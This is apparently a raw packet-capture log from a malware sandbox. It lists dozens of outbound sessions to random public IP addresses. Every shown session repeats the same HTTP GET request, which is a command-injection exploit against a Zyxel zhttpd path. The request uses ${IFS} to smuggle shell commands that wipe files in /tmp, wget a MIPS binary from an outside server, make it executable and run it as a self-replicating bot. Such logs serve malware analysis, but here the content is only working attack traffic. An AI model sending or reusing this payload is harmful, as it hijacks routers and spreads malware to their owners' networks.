                                      Jan 14, 2024 15:50:37.072525024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1956192.168.2.1459952175.39.36.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072582006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1957192.168.2.1451254190.157.75.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072619915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1958192.168.2.144491698.135.83.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072644949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1959192.168.2.144592477.182.220.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072690964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1960192.168.2.145408412.149.101.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072729111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1961192.168.2.14434248.121.140.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072761059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1962192.168.2.1447842112.73.82.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072807074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1963192.168.2.145546850.36.253.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072856903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1964192.168.2.1446572207.67.13.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072890043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1965192.168.2.1459862179.56.64.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072921991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1966192.168.2.144167487.189.209.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072968960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1967192.168.2.144086692.137.110.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073021889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1968192.168.2.143842296.96.96.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073069096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1969192.168.2.1450490152.0.223.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073112011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1970192.168.2.1454334211.48.69.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073158979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1971192.168.2.1433124113.130.128.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073200941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1972192.168.2.1449852117.252.165.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073255062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1973192.168.2.1458620210.232.75.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073302984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1974192.168.2.1443162223.155.255.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073342085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1975192.168.2.144176632.219.161.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073393106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1976192.168.2.1438272173.251.195.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073430061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1977192.168.2.143585414.128.146.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073479891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1978192.168.2.1451498124.59.125.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073510885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1979192.168.2.144110072.99.49.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073571920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1980192.168.2.1436064170.2.52.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073609114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1981192.168.2.1438500189.220.112.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073694944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1982192.168.2.144209450.250.22.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073724031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1983192.168.2.144396064.221.154.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073786020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1984192.168.2.144427847.51.34.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073821068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1985192.168.2.144117625.160.56.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073863029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1986192.168.2.1432928212.39.55.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073896885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1987192.168.2.1457530174.251.98.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.073966980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1988192.168.2.144740250.245.237.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074002981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1989192.168.2.143781249.81.11.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074050903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1990192.168.2.145867468.3.128.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074086905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1991192.168.2.144924298.1.160.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074120998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1992192.168.2.144762877.158.135.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074158907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1993192.168.2.1459392198.140.213.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074193954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1994192.168.2.1448986167.76.182.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074249029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1995192.168.2.145926852.50.130.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074292898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1996192.168.2.1459818114.165.17.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074335098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1997192.168.2.143896240.167.29.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074366093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1998192.168.2.1446372116.62.108.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074419975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1999192.168.2.1455320133.168.217.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074461937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2000192.168.2.145671424.204.212.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074493885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2001192.168.2.145773635.191.79.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074528933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2002192.168.2.1446972158.65.189.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074574947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2003192.168.2.1459784216.28.45.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074606895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2004192.168.2.1456226125.238.179.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074657917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2005192.168.2.145596239.6.254.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074681044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2006192.168.2.1460782153.158.1.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074742079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2007192.168.2.14507921.127.162.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074795008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2008192.168.2.143917631.169.187.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074851990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2009192.168.2.1432826181.105.24.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074875116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2010192.168.2.145992047.119.27.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074909925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2011192.168.2.144245661.164.181.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074951887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2012192.168.2.145824699.96.47.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.074987888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2013192.168.2.14583649.200.201.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075026035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2014192.168.2.1448830193.103.47.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075081110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2015192.168.2.1457756213.59.6.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075113058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2016192.168.2.1447504177.66.197.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075153112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2017192.168.2.1448798100.248.216.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075193882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2018192.168.2.145497872.253.141.62443
                                      TimestampBytes transferredDirectionData
